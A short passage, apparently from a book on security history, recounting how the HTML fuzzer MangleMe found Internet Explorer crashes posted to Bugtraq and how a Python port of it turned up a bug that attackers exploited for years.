HTML fuzzer that he called MangleMe. He used it to find several Internet Explorer
crashes that he posted to Bugtraq along with a copy of his tool. A hacker named ned
then used a Python port of this tool to find a simple bug that ended up being abused by
hackers for years afterward.